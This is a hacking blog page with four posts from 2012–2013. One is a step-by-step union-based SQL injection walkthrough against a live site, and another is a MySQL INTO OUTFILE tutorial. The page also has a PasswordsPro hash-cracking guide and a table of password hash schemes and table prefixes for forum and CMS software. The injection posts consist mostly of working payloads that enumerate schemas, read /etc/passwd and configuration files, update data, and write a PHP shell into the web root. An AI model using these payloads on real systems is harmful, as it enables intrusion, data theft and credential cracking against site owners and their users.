Friday, January 11, 2013

Real World SQL Injection

Exploiting Web 2.0 , Real World SQL INJECTION




0x000 - NULL
0x001 - Introduction
0x010 - Global Exploiting
0x011 - Exploiting The Bug
0x101 - Conclusion
0x110 - Help full links


------------------------------------------------------

0x001 - Introduction :

SQL Injection is a technique allow you to exploit

a web vulnerability to extract content of the database

and show it for the injector thanks to an error while the

request ....

------------------------------------------------------

0x010 - Global Exploiting :

Exploiting The SQL Injection Vulnerability

To Exploit This Vulnerability You Got to have the following

conditions :

1- Null the query

2- Get The Number of columns

-> To null the query its enough to add something that does not

exist in the database

-> To know the number of columns in MySQL you can

use the next command in the query : '+order+by+x--

x is the number of columns you try to guess :

=> if the page shows normal with no errors this means that

the number you entered is < than real number of columns

=> if the page show and error this means that

the number you entered is > than real number of columns

now you are wondering how to know the real number of columns

i'll tell you , its the number right before 1st error !

Note : Don't forget the comment :

( -- or /* or # or a null byte )

i hope its pretty clear

so build the query like this

=> ' union select 1,2,3--

1,2,3 -> number of columns

in our example the number of columns is 19 :

'+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18--




xx - now lets get basic info about this database

=> DataBase Name

-> you can get the version of the db with 'database()'

' union select 1,2,3,4,5,6,7,database(),9,10,11,12,13,14,15,16,17 ,18,19--




The database is called "fluff2"

=> DataBase Version

-> you can get the version of the db with 'version()'

' union select 1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17, 18,19--




The database Version is "5"

=> DataBase UserName

-> you can get the version of the db with 'user()'

' union select 1,2,3,4,5,6,7,user(),9,10,11,12,13,14,15,16,17,18, 19--




The database username is "muu"

=> DataBase Location

-> you can get the version of the db with '@@datadir'

' union select 1,2,3,4,5,6,7,@@datadir,9,10,11,12,13,14,15,16,17, 18,19--




The database is located in "/var/lib/mysql/"

xxx - Get your privileges !

Let's Try any priv's (select,update,file etc...)

' union select 1,2,3,4,5,6,7,update_priv,9,10,11,12,13,14,15,16,1 7,18,19 from mysql.user--

' union select 1,2,3,4,5,6,7,file_priv,9,10,11,12,13,14,15,16,17, 18,19 from mysql.user--

' union select 1,2,3,4,5,6,7,select_priv,9,10,11,12,13,14,15,16,1 7,18,19 from mysql.user--

it seems that nothing is allowed !




well , since our user is muu lets try to see our priv's while our user = muu

' union select 1,2,3,4,5,6,7,select_priv,9,10,11,12,13,14,15,16,1 7,18,19 from mysql.user where user=CHAR(109, 117, 117)--

we can see we got full privileges now :P




0x011 - Exploiting The Bug :

let's try now to get the database content and use it !

=> uploading a file !

to upload any file magic_quotes got to be set 'OFF'

-> what the fuck is magic_quotes ?

Magic_Quotes is a feature in php Made to help coders

and developers to avoid falling in SQL injections vulnerabilities

and its going to be removed in PHP6 !

Well , in Our FaceBook Magic_Quotes Are set 'ON'

we cannot use into outfile to upload a File .!

=> Getting DB content :

to read content of a specific column , you must use the following

' union select 1,2,3,4,5,6,7,column,9,10,11,12,13,14,15,16,17,18, 19 from table--

column -> its your wanted column to read

table -> its the table where the wanted column located

Now you wonder , You don't know column names or table names ,

how to do ?

since its V5 The database it got to have information_schema inside

so let's exploit information_schema :

-> Get Tables :

' union select 1,2,3,4,5,6,7,concat(table_name,0x7c,table_schema, 0x7c),9,10,11,12,13,14,15,16,17,18,19 FROM information_schema.tables--




Like you See It's showing the name of the table | database

but only one table appears ! what to do to show to rest ?

change concat into group_concat ; the xplt like this :

' union select 1,2,3,4,5,6,7,group_concat(table_name,0x7c,table_s chema,0x7c),9,10,11,12,13,14,15,16,17,18,19 FROM information_schema.tables--




well its showing some more

but this is not all

lets try something different !

add after our current exploit LIMIT 1 OFFSET 44--

' union select 1,2,3,4,5,6,7,concat(table_name,0x7c,table_schema, 0x7c),9,10,11,12,13,14,15,16,17,18,19 FROM information_schema.tables LIMIT 1 OFFSET 44--

and Change the '44' to another number and it will show another table

Now you wonder how to get table columns ?!

Alright , you can get table columns from information_schema.columns like the following

from+information_schema.columns+where+table_name=" table_name"

so in our exploit it will became like this :

' union select 1,2,3,4,5,6,7,column_name,9,10,11,12,13,14,15,16,1 7,18,19 FROM information_schema.columns where table_name='info'--

since Magic_Quotes are set to 'ON' we must convert table name to ASCII

' union select 1,2,3,4,5,6,7,column_name,9,10,11,12,13,14,15,16,1 7,18,19 FROM information_schema.columns where table_name=CHAR(105, 110, 102, 111)--




Bingo ! this is one column

to show the others use 'limit 1 offset'

You can see content of any column =)

For Now lets try to look for specific table or specific column !

you can get it using

' union select 1,2,3,4,5,6,7,column_name,9,10,11,12,13,14,15,16,1 7,18,19 from information_schema.columns where column_name like time--

Note : time is the column wanted to look for

and dont forget to change the column to ASCII because magic_quotes on

' union select 1,2,3,4,5,6,7,column_name,9,10,11,12,13,14,15,16,1 7,18,19 from information_schema.columns where column_name like CHAR(116, 105, 109, 101)--

To see other infos of the column concatenate 'column_name' with table_schema and table_name

' union select 1,2,3,4,5,6,7,concat(column_name,0x7c,table_schema ,0x7c,table_name),9,10,11,12,13,14,15,16,17,18,19 from information_schema.columns where column_name like CHAR(116, 105, 109, 101)--




update fluff2 set time=alphanix where

Bingo ! You can see column , db , table , and look for any column ,

pretty easy ? isn't

=> Reading Any File content :

since we have file loading privileges , we can load any file

in the server (must have right permissions) and show it !

' union select 1,2,3,4,5,6,7,load_file(/etc/passwd),9,10,11,12,13,14,15,16,17,18,19 from mysql.user where user=muu--

and convert to ascii

' union select 1,2,3,4,5,6,7,load_file(CHAR(47, 101, 116, 99, 47, 112, 97, 115, 115, 119, 100)),9,10,11,12,13,14,15,16,17,18,19 from mysql.user where user=CHAR(109, 117, 117)--




here we loaded '/etc/passwd' file , i would like to

get the shadow but i dont have root privileges

=> Updating the database :

since we got update privilege we can change value

of any field in the db !

update query is like the following :

' update table_name set column_name='new value' where column_name='value' where user=muu

never forget to convert to ascii xD

------------------------------------------------------

0x101 - Conclusion :

SQL injections are vulnerable in 60% of scripts , and its really important

to learn how to protect our selves from it to make more secure scripts


0x110 - Additional Useful Link :

http://pentestmonkey.net/blog/mysql-sql-injection-cheat-sheet/

Monday, January 7, 2013

How to use Passwords Pro

My Tutorial will show you the 3 easiest Functions to make use of Dictionary attack and Hybrid attack

Before we begin, You will need the following:

1. PasswordsPro
2. A wordlist (Multiple lists are suggested)
3. A Brain
4. Patience

To begin i will show you a Dictionary Attack

Note: The algorithm depends on your Hash.

1. Open PasswordsPro


2. Click Options
3. Click Hashing Modules, Right Click, Add
4. Browse to your PasswordsPro Folder


5. Open the Modules folder, Press CTRL+A, Deselect the 2 folders.


6. Press ok
7. Click Dictionaries, Right click, Add



8. Select your Dictionaries (Ensure you click All files) For this ill be using MoPList.dic, Click OK etc etc



9. Note: Time to Input your hashes, This can be done in multiple way, I will only be showing the MANUAL way.
Right click one of the cells, Click Add


10. Insert your hash, I will be using these hashes :

10af61c65f34b24a1c591ca77eff73c0:10blah


Note: Just to show you how i would Usually do it


11. Select your type of attack, Simple Dictionary

12. Press Start
13. The program will then work on cracking your hashes.
14. As you can see, The program has found one of my passwords.


15. Enjoy =)
Note: You have never 100% guaranteed to find a password

Hybrid Attack

Simply follow the steps above, But at Step 7 click press, Hybrid Dictionary Attack


And as you can see, I have found another password =)

Monday, December 31, 2012

List of Password Encryption Algorithms

                  List of algorithms in forums :
------------------------------------------------------------------------------------
|     Title      |    Hash Algorithm    |    Prefix    |      Table     |
------------------------------------------------------------------------------------
| Beehive           | md5($pass)                 | нет          | USER             |
| Intellect Board   | md5($pass)                 | нет          | User             |
| IPB 1.x.x         | md5($pass)                 | ibf_         | members          |
| IPB 2.x.x         | md5(md5($salt).md5($pass)) | ibf_         | members_converge |
| ITA Forum         | md5($pass)                 | itaf_        | user             |
| MercuryBoard      | md5($pass)                 | mb_          | users            |
| MiniBB            | md5($pass)                 | minibbtable_ | users            |
| myBB 1.2.x        | md5(md5($salt).md5($pass)) | mybb_        | users            |
| PBLang            | md5($pass)                 |  хеш для каждого пользователя хранится в файле /db/members/имя_юзера |
| phpBB             | md5($pass)                 | phpbb_       | users            |
| phpBB > 3.0.0 RC5 | md5(phpbb3)                | phpbb_       | users            |
| PhpMyForum        | md5($pass)                 | pmf_         | user             |
| PunBB 1.2.x       | SHA-1                      | нет          | users            |
| SMF 1.0.x         | md5(HMAC)                  | smf_         | members          |
| SMF 1.1.x         | sha1($username.$pass)      | smf_         | members          |
| Snitz forums 2000 | SHA-256                    | FORUM_       | MEMBERS          |
| QuickSilver Forum | md5($pass)                 | qsf_         | users            |
| UseBB             | md5($pass)                 | usebb_       | members          |
| Vanilla           | md5($pass)                 | LUM_         | User             |
| VBulletin         | md5(md5($pass).$salt)      | нет          | user             |
| VikingBoard       | md5($pass)                 | vboard_      | member           |
| W-Agora           | md5($pass)                 | [название]_  | users            |
| WWWThreads        | DES(unix)                  | w3t_         | users            |
| XMB Forum         | md5($pass)                 | нет          | members          |
| YaBB              | md5(HMAC)                  | yabbse_      | members          |
------------------------------------------------------------------------------------


Code:
           List of algorithms used in CMS, online shops, etc.
------------------------------------------------------------------------------------
|      Title          |    Hash Algorithm    |        Prefix    |        Table       |
------------------------------------------------------------------------------------
| AboCMS            | md5($pass)                 | нет          | users            |
| Bitrix            | md5($pass)                 |     проверить не удалось        |
| DaneoCMS          | md5($pass)                 | dn[версия]_  | users            |
| DataLife Engine   | md5(md5($pass))            | dle_         | users            |
| e107              | md5(md5($pass))            | e107_        | user             |
| Joomla            | md5($pass)                 | jos_         | users            |
| Joomla >=1.0.13   | md5($pass.$salt)           | jos_         | users            |
| Koobi CMS         | md5($pass)                 | koobi_       | user             |
| Koobi CMS >= 6    | md5(md5($pass))            | koobi_       | user             |
| osCommerce        | md5($salt.$pass)           | нет          | сustomers        |
| PHP-Nuke          | md5($pass)                 | nuke_        | authors          |
| RunCMS            | sha1($username.$pass)      | runcms_      | users            |
| Slaed CMS         | md5($pass)                 | slaed_       | users            |
| Wordpress         | md5($pass)                 | wp_          | users            | 
| Wordpress >= 2.5  | md5(phpbb3)                | wp_          | users            |
| XOOPS             | md5($pass)                 | xoops_       | users            | 
------------------------------------------------------------------------------------

Tuesday, December 25, 2012

What is INTO OUTFILE ? (MYSQL SQL Injection Explained)


[+1] The FILE privilege

If we want to read or write to files we have to have the FILE privilege.
First see which user we are in db with code:

0′ UNION SELECT current_user,null /*

you can put current_user or user() or system_user

This will give us the username@server. //(normally ..@localhost)

*
You can also use the following blind SQL injections query,
but it's very booring.. :

Guess a name:
1′ AND user() LIKE ‘root
Brute the name letter by letter:
1′ AND MID((user()),1,1)>’m
1′ AND MID((user()),2,1)>’m
1′ AND MID((user()),3,1)>’m ecc...

Now we must access to mysql.user so..

0′ UNION SELECT 1,2,3,file_priv,4 FROM mysql.user WHERE user = ‘username

for username we put the name of current_user.
You can also have a look at the whole mysql.user table without the WHERE clause, but I chose this way because you can easily adapt the injection for blind SQL injection:

1′ AND MID((SELECT file_priv FROM mysql.user WHERE user = ‘username’),1,1) = ‘Y

Naturally, this it's a blind so yuo can't write 1,2,3.. because it's not a union select. (but it's subselects )

You can also receive the FILE privilege info from the information.schema table on MySQL 5:

0′ UNION SELECT grantee,is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘file’ AND grantee like ‘%username%

Like IN blind sqli:

1′ AND MID((SELECT is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘file’ AND grantee like ‘%username%’),1,1)=’Y


[+2] The web directory problem

Once we know if we can read/write files we have to check out the right path. In the most cases the MySQL server is running on the same machine as the web server does and to access our files later we want to write them onto the web directory. If you define no path, INTO OUTFILE will write into the database directory.

On MySQL 4 we can get an error message displaying the datadir:
0′ UNION SELECT load_file(’a'),null/*

On MySQL 5 we use:
0′ UNION SELECT @@datadir,null/*

The default path for file writing then is datadir\databasename.
You can figure out the databasename with:
0′ UNION SELECT database(),null/*

Now these information are hard to get with blind SQL injection. But you don’t need them necessarily. Just make sure you find out the web directory and use some ../ to jump back from the datadir.

If you are lucky the script uses mysql_result(), mysql_free_result(), mysql_fetch_row() or similar functions and displays warning messages. Then you can easily find out the webserver directory by leaving those functions with no input that they will throw a warning message like:

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /web/server/path/file.php on line xxx

To provoke an error like this try something like:
0′ AND 1=’0 or add some like param[]=1

This works at the most websites. If you’re not lucky you have to guess the web directory or try to use load_file() to fetch files on the server which might help you. Here is a new list of possible locations for the Apache configuration file, which may spoil the webdirectory path:

/etc/init.d/apache
/etc/init.d/apache2
/etc/httpd/httpd.conf
/etc/apache/apache.conf
/etc/apache/httpd.conf
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache/conf/httpd.conf
/opt/apache/conf/httpd.conf
/home/apache/httpd.conf
/home/apache/conf/httpd.conf
/etc/apache2/sites-available/default
/etc/apache2/vhosts.d/default_vhost.include

Check out the web servers name first by reading the header info and then figure out where it usually stores its configuration files. This also depends on the OS type (*nix/win) so you may want to check that out too. Use @@version or version() to find that out:
0′ UNION SELECT @@version,null /*
-nt-log at the end means it’s a windows box, -log only means it’s *nix box.
Or take a look at the paths in error messages or at the header.

Typical web directories to guess could be:

/var/www/root/
/var/www/dbname/path/
/var/www/sitename/htdocs/
/var/www/localhost/htdocs
..


Basically you should be allowed to write into any directory where the MySQL server has write access to, as long as you have the FILE privilege. However, an Administrator can limit the path for public write access.

[+3] create useful files

Once you figured out the right directory you can select data and write it into a file with:

0′ UNION SELECT columnname,null FROM tablename INTO OUTFILE ‘../../web/path/file.txt

( sometimes from mysql.user )
Or the whole data without knowing the table/column names:

1′ OR 1=1 INTO OUTFILE ‘../../web/path/file.txt

If you want to avoid splitting chars between the data, use INTO DUMPFILE instead of INTO OUTFILE.

You can also combine load_file() with into outfile, like putting a copy of a file to the accessable webspace:

0′ AND 1=0 UNION SELECT load_file(’…’) INTO OUTFILE ‘…

In some cases I’d recommend to use

0′ AND 1=0 UNION SELECT hex(load_file(’…’)) INTO OUTFILE ‘…

and decrypt it later with the PHP Charset Encoder, especially when reading the MySQL data files.

Or you can write whatever you want into a file:

0′ AND 1=0 UNION SELECT ‘code’,null INTO OUTFILE ‘../../web/server/dir/file.php

Here are some useful code examples:

A Normal code for a shell (PHP):



it's very important that the PHP safe_mode must be turned off!!.
If is turned on maybe we can bypass symple with a hex converter:

we can convert the code for bypass MAGIC_QUOTES_GPC filter.
(normally yuo cans ee if hex_mode work with a load_file(pathinhex),
like load_file(0x2f6574632f706173737764) for /etc/password (<= usually path)


we can see a lot of informations about the web server configuration with:



// SQL QUERY

Try to use load_file() to get the database connection credentials, or try to include an existing file on the webserver which handles the mysql connect.

Remember that the quotes are required and so if the error are like:

error db near '\/www/root/path/page.php'\
 maybe it's because the quotes are not allowed (with special filter used for anti-xss)

So at the end: try and try and try. Good luck! :)
Certified Ethical Hacker Network Security Internet Security Computer Security Wireless Network Security